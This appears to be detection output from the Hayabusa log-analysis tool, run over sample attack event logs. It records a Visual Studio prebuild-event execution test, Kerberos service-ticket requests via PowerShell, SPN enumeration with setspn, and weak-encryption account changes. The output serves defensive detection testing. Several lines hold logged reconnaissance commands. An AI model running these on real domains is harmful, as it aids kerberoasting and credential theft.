+2021-01-26 22:21:13.972 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\blabla.lastbuildstate | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.975 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:13.978 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | Process: C:\Windows\SysWOW64\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 23168 | PGUID: 00247C92-1749-6010-0000-0010EFAAD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,low,Exec,Non Interactive PowerShell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.023 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: powershell.exe start-process notepad.exe | Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\windows\system32\cmd.exe"" /Q /D /C C:\Users\bouss\AppData\Local\Temp\tmpf890f11830e143ada2d718f706dd94c0.exec.cmd | LID: 0x26f746a2 | PID: 18548 | PGUID: 00247C92-174A-6010-0000-0010C0B2D92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.296 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\SysWOW64\notepad.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: powershell.exe start-process notepad.exe | LID: 0x26f746a2 | PID: 28276 | PGUID: 00247C92-174A-6010-0000-001042DDD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.399 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.425 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.428 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe /nologo /nodemode:1 /nodeReuse:true /low:false | LID: 0x26f746a2 | PID: 18188 | PGUID: 00247C92-174A-6010-0000-0010DCFFD92E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.456 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\cl.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\Tracker.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp5938b880d43743db91973c95f519f06b.tmp"" /c ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @""C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp"" | LID: 0x26f746a2 | PID: 11676 | PGUID: 00247C92-174A-6010-0000-0010A20ADA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.667 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\VCTIP.EXE"" | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\Hostx86\x86\vctip.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\VC\Tools\MSVC\14.26.28801\bin\HostX86\x86\CL.exe"" @C:\Users\bouss\AppData\Local\Temp\tmp19546d957b6e4d15b83f93a323d5f087.rsp | LID: 0x26f746a2 | PID: 11636 | PGUID: 00247C92-174A-6010-0000-0010FF10DA2E",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.write.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.871 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.read.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:14.872 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\source\repos\blabla\blabla\Debug\blabla.tlog\CL.command.1.tlog | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\MSBuild\Current\Bin\MSBuild.exe | PID: 2988 | PGUID: 00247C92-1749-6010-0000-0010348FD92E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:23.229 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_277b7688d03b431eb925a7d64307d79a.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:23.303 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelAIF-312cbd79-9dbb-4c48-a7da-3cc2a931cb70\20210126132123_dd350a9897114eee834fb0993b4dee7e.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:23.305 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\AppData\Local\Microsoft\VSApplicationInsights\vstelf144292e-e3b2-4011-ac90-20e5c03fbce5\20210126132123_195f3c1acef04eaeb6f67d3ff46e5958.tmp | Process: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Common7\IDE\devenv.exe | PID: 7664 | PGUID: 00247C92-172A-6010-0000-00103C3DD02E,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-26 22:21:33.197 +09:00,LAPTOP-JU4M3I0E,11,info,,File Created,Path: C:\Users\bouss\Downloads\prebuildevent_visual_studio.evtx | Process: C:\windows\system32\mmc.exe | PID: 22932 | PGUID: 00247C92-EC0A-600F-0000-00100AEFCC2C,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/execution_evasion_visual_studio_prebuild_event.evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,$SPNName = 'MSSQLSvc/Svc-SQL-DB01.offsec.lan',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,Add-Type -AssemblyNAme System.IdentityModel,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Add-Type): ""Add-Type"" ParameterBinding(Add-Type): name=""AssemblyName""; value=""System.IdentityModel""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:13.309 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $SPNName,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.546 +09:00,fs02.offsec.lan,4104,high,CredAccess,Request A Single Ticket via PowerShell,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_request_kerberos_ticket.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.561 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""ArgumentList""; value=""MSSQLSvc/Svc-SQL-DB01.offsec.lan"" ParameterBinding(New-Object): name=""TypeName""; value=""System.IdentityModel.Tokens.KerberosRequestorSecurityToken"" TerminatingError(New-Object): ""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.671 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.686 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.702 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.717 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Version""; value=""1.0""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-01-30 18:13:17.733 +09:00,fs02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default"" ParameterBinding(Out-Default): name=""InputObject""; value=""Exception calling "".ctor"" with ""1"" argument(s): ""The NetworkCredentials provided were unable to create a Kerberos credential, see inner exception for details.""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4103-4104 - SPN discovery (moder nPowerShell).evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1015,technique_name=Accessibility Features | Cmd: setspn -T offsec -Q */* | Process: C:\Windows\System32\setspn.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x161c887 | PID: 3360 | PGUID: 7CF65FC7-E247-6017-0804-000000001B00 | Hash: SHA1=3B8C77CC25CF382D51B418CB9738BA99C3FDBAA9,MD5=C729DEA1888B1B047F51844BA5BD875F,SHA256=E3B06217D90BD1A2C12852398EA0E85C12E58F0ECBA35465E3DC60AC29AC0DC9,IMPHASH=6CBDE380709080AA31FA97FC18EF504E",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-01 20:13:11.195 +09:00,fs02.offsec.lan,1,medium,CredAccess,Possible SPN Enumeration,,../hayabusa-rules/sigma/process_creation/proc_creation_win_spn_enum.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID1-SPN discovery (SYSMON process).evtx
+2021-02-04 00:17:16.085 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | Path: C:\Windows\System32\dllhost.exe | PID: 0x13d8 | User: MSSQL01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-SQL Server started in single mode for psw recovery.evtx
+2021-02-04 00:33:16.107 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sqlcmd -S .\RADAR,2020 | Path: C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\110\Tools\Binn\SQLCMD.EXE | PID: 0x1204 | User: admmig | LID: 0x372a4",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1505.001-SQL Stored Procedures/ID4688-sqlcmd tool abuse in SQL Server.evtx
+2021-02-08 21:03:02.776 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-User set with reversible psw encryption.evtx
+2021-02-08 21:06:15.608 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Use only Kerberos DES encryption types.evtx
+2021-02-08 21:06:53.407 +09:00,rootdc1.offsec.lan,4738,high,Evas,Weak Encryption Enabled and Kerberoast,,../hayabusa-rules/sigma/builtin/security/win_alert_enable_weak_encryption.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738-Do not require Kerberos preauthentication.evtx
+2021-02-08 22:01:11.198 +09:00,WIN10-client01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\WINDOWS\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: C:\Windows\System32\dllhost.exe | PID: 0x1b1c | User: WIN10-CLIENT01$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1564-Hide artifacts/ID4688-Linux Subsystem installation (WSL).evtx
